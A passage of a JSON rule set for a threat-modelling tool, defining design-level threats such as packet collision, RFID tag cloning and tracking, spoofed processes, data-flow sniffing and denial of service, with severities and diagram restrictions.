date","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"105910c0-a5b5-4496-a2f7-99f11422e4b0","Name":"Missing update interval information","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"8f8d0183-5a29-451a-bb84-df061c0728d4","Name":"Missing update notification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d406176c-9381-4f8c-aecc-b6d7ba56c7da","Name":"Full-scale outage","Description":"A full-scale outage may cause the solution to be unavailable for its users. This may be caused by natural events but also by a malicious actor.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6f4e4f07-79e0-4f16-b447-dbc325b42e91","DetailRestrictions":[]},"Severity":2},{"ID":"ea3713af-49ae-4069-8353-78141725af6f","Name":"Missing time synchronization","Description":"A synchronized system time is necessary to correctly create and subsequently analyze logs.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8643278b-1ab3-4359-9ab9-f3911bf336e6","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"1221dc8c-f495-4833-a027-c3c5d2dc1a7d","Name":"Collision attack","Description":"Attackers who can send a series of packets or messages may be able to overlap data. For example, packet 1 may be 100 bytes starting at offset 0. Packet 2 may be 100 bytes starting at offset 25. Packet 2 will overwrite 75 bytes of packet 1. Ensure you reassemble data before filtering it, and ensure you explicitly handle these sorts of cases.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"fec7c871-d868-4edf-9bca-80c9061e830b","Name":"JSON processing","Description":"If a dataflow contains JSON, JSON processing and hijacking threats may be exploited.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"82c0d2ca-5756-40bd-a2e9-3c7ab8c5c2ba","Name":"Tag cloning","Description":"A cloned tag may enable access to sensitive data or restricted areas","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[]},"Severity":2},{"ID":"bd2cf4bb-a728-46bd-8d38-269b4cfef7be","Name":"Tag tracking","Description":"Tracking a tag by its unique identifier allows, for example, to create a movement profile","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["61d04f2d-83b1-4152-9aba-4ad188eef06d","2765e61e-29a9-498e-adf8-4d653f488e3d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[]},"Severity":2},{"ID":"d07d24f4-10b5-452d-a489-10c9752dda4d","Name":"Tag inventorying","Description":"Tags with an EPC are vulnerable to inventory attacks. For example, medical devices such as pacemakers can be used to draw conclusions about the health of individuals.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","e6ba8518-0074-492c-95e5-ebe89fa601fe"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"355ded09-e3ae-41f7-8bbb-3fa0870e35a6","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"6394d7a4-c2db-4fe6-826c-93b1cd0d5373","Name":"Location tracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","2765e61e-29a9-498e-adf8-4d653f488e3d","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"840b5bd1-b250-427c-bf56-5ddf826382ff","DetailRestrictions":[]},"Severity":3},{"ID":"66f7a456-2edb-4d91-9bd1-aec421a92011","Name":"Sending data to spoofed data store","Description":"Process has outbound data flow to data store. E.g., database is spoofed, process writes to wrong place. (see Threat modeling - designing for security: Table 3-10-1)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"ddc5a2f1-7466-488d-a4f4-9f6a1520a00e","Name":"Sending confidential data to data store","Description":"Process has outbound data flow to data store. E.g. process writes information to data store which should not be there. (see Threat modeling - designing for security: Table 3-10-1)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"4d724289-8fe3-47c5-b44b-7fd9cac6c701","Name":"Sending data to spoofed process","Description":"Process sends output to another process. E.g., Process2 is spoofed, Process1 writes to wrong place. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"97682dbc-2fb9-456d-94c3-a6a09998b5a4","Name":"Process denies receiving data","Description":"Process sends output to another process. E.g., Process2 claims not to have received data from Process1.  (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"9e788439-62ed-44ea-9b19-093f92cf2223","Name":"Sending confidential data to process","Description":"Process sends output to another process. E.g., Process2 is not authorized to receive data. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"30b01ab6-2eea-49ff-ac4e-f5838f8a8337","Name":"Sending data to spoofed log. external entity","Description":"Process sends output to log. external entity. E.g., external entity is spoofed. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"4f56c6cd-3daa-4b7a-91a5-740403957ff5","Name":"External entity denies receiving data","Description":"Process sends output to log. external entity. E.g., browser disclaims and doesn\'t acknowledge the output. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"7b140721-9f7a-46a7-8290-931efec07769","Name":"Sending confidential data to log. external entity","Description":"Process sends output to log. external entity. E.g., ext. entity gets data it\'s not authorized to get. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"557991c1-4eeb-40e1-96c3-c8a214278e29","Name":"Phy. external entity denies receiving data","Description":"Process sends output to phy. external entity. E.g., human disclaims seeing the output. (see Threat modeling - designing for security: Table 3-10-4)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"8fabcdad-c70f-4416-8cb6-5c65a21142b0","Name":"Receiving data from spoofed data store","Description":"Process has inbound data flow from data store. E.g., database is spoofed and process reads the wrong data. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"f5894534-60a9-4363-84e5-4c0479ca71b9","Name":"Processing corrupted data","Description":"Process has inbound data flow from data store. E.g., process is corrupted by data read from the data store. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"71f98504-8182-4fb2-81ed-aea1e1953215","Name":"Process denies services due to received data","Description":"Process has inbound data flow from data store. E.g., process state is corrupted by the data retrieved from the data store. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"6d1d58a3-f4ff-4938-93d8-d91bb9ae3f58","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from data store. E.g., process internal state is corrupted based on data read from the data store, leading to code execution.  (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8687e614-c127-418b-8fda-536bb2f0708f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"6ca91e1b-746c-47bb-8cd3-2fa0c478042e","Name":"Receiving data from spoofed process","Description":"Process has inbound data flow from another process. E.g., Process1 believes it\'s getting data from Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"a1b5637c-fac3-4b49-bf3f-5f39ce8757da","Name":"Process denies receiving data","Description":"Process has inbound data flow from another process. E.g., Process1 denies getting data from Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"c0158e50-7c0f-4457-a8ea-223ff165fdaf","Name":"Process denies services","Description":"Process has inbound data flow from another process. E.g., Process1 crashes due to interaction with Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"984d970a-8ef5-445c-a15b-7613b313306c","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from another process. E.g., Process2 passes data or args that allow it to change flow of execution of Process1. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"a7f340d4-3aa2-45d2-9226-db55414c7f69","Name":"Receiving data from spoofed external entity","Description":"Process has inbound data flow from external entity. E.g., Process believes it\'s getting data from the ext. entity, when it fact it\'s a random attacker. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"2a2ea224-58c9-4187-b721-940fc97b1c04","Name":"Process denies services","Description":"Process has inbound data flow from external entity. E.g., process crashes due to ext. entity interaction. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"c1e53b74-7e9d-4566-b690-978bfc8b9af3","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from external entity. E.g., ext. entity passes data or args that allow it to change flow of execution of process. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8687e614-c127-418b-8fda-536bb2f0708f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"35915020-1d0c-4853-849d-d32159bf6401","Name":"Tampering with data flow","Description":"Data flow crosses trust boundary. E.g., data flow is modified by MITM attack. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}}]}},{"ID":"1308104d-16da-432f-a70f-8de14a8bfbf9","Name":"Data flow sniffing","Description":"Data flow crosses trust boundary. E.g., the contents of the data flow are sniffed on the wire. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":false}}]}},{"ID":"3008afca-320c-489b-9ff6-f61b7cdf497c","Name":"Denial of service","Description":"Data flow crosses trust boundary. E.g., the data flow is interrupted by an ext. entity, e.g. messing with TCP sequence numbers. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"46a79465-8cb7-4c8e-8025-e1a08e9620d8","Name":"Corrupting the data store","Description":"Process has outbound data flow to data store. E.g., data store is corrupted. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"134a6570-e75e-4c8a-bd2f-f02b5a052878","Name":"Data store reveals information","Description":"Process has outbound data flow to data store. E.g., data store reveals information. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"4c4d3f55-3ffd-4416-9bc3-4bf2921110e1","Name":"Process denies writing data","Description":"Process has outbound data flow to data store. E.g., process claims not to have written to data store. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"0115bdb1-d2ab-4bbc-bfd1-b23c831b5a70","Name":"Data store cannot be written to","Description":"Process has outbound data flow to data store. E.g., data store cannot be written to. (see Threat modeling - designing for security: Table 